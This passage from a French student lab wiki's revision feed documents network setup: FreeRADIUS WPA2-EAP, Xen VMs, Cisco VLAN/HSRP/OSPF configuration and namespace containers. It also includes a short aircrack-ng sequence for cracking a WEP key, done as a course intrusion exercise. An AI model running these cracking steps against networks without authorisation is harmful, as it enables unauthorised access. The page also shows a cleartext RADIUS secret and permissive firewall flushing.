Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
router ospf 1&lt;br /&gt;
 router-id 10.60.11.252&lt;br /&gt;
 log-adjacency-changes&lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
 redistribute connected subnets&lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49093</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49093"/>
				<updated>2018-12-21T15:19:29Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Configuration du VLAN 131 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
